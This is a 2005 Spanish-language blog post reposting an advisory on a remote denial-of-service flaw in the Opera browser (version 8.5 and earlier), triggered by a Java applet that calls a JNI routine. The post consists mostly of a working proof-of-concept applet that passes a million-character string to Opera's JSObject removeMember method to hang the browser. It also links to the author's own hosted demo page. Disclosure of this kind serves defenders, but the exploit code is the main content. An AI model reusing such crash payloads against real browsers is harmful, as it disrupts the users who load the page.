ecoestadistica.com

lunes, diciembre 05, 2005

Opera Web Browser JNI Routine Handling Remote Denial of Service Vulnerability

version Vulnerable 8.5 y anteriores

Detalles:
----------

El Navegador ópera es propenso a un remote denial of service

El problema se presenta cuando el navegador maneja un applet de Java que contiene una rutina de JNI.

Un ataque exitoso puede causar que el navegador se ¨cuelgue¨.

Prueba de Concepto:
------------------------

import java.applet.Applet;
import java.awt.Graphics;

import netscape.javascript.JSObject;

public class OperaTest extends Applet{
static {
System.out.println("Loaded 1.2");
}
public void paint(Graphics g) {
System.out.println("start");
try {
netscape.javascript.JSObject jso = JSObject.getWindow(this);
System.out.println(jso.getClass());
com.opera.JSObject j = (com.opera.JSObject ) jso;
char[] x = new char[1000000];
for (int y = 0 ; y < x.length; y++) {
x [y] = 'A';
}
String z = new String(x);
System.out.println("after evalb");
j.removeMember(z);
System.out.println("after remove");
}
catch (Exception e) {
e.printStackTrace();
}
}
}

Mi Prueba de Concepto (utilizando applet)

http://ciberia.ya.com/webmousehack/OperaCrash.html

Fuente:packetstorm

Salu2

0 Comments:

Publicar un comentario

Links to this post:

Crear un vínculo

<< Home

ecoestadistica.com